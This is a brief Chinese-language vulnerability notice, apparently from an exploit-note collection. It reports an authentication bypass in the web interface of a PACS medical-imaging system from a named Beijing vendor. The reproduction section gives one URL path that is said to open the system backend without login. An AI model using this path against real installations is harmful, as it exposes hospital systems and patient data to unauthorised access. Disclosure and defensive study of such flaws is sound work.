北京新网医讯技术有限公司PACS系统web端存在未授权访问漏洞
一、漏洞简介
北京新网医讯技术有限公司,公司成立于2000年3月,注册于北京中关村科技园,为国家高新技术企业和中关村高新技术企业(简称为“双高企业”),公司作为软件企业,成为北京软件和信息服务业协会会员。公司专业从事PACS(图像存储与传输系统)和RIS(放射科信息管理系统)的研究、开发工作。北京新网医讯技术有限公司PACS系统web端存在未授权访问漏洞,攻击者可通过该漏洞绕过身份认证进入系统后台。
二、影响版本
- 北京新网医讯技术有限公司PACS系统web端
三、特征
四、漏洞复现
访问如下url可绕过身份认证直接进入系统后台
/ClinicList.aspx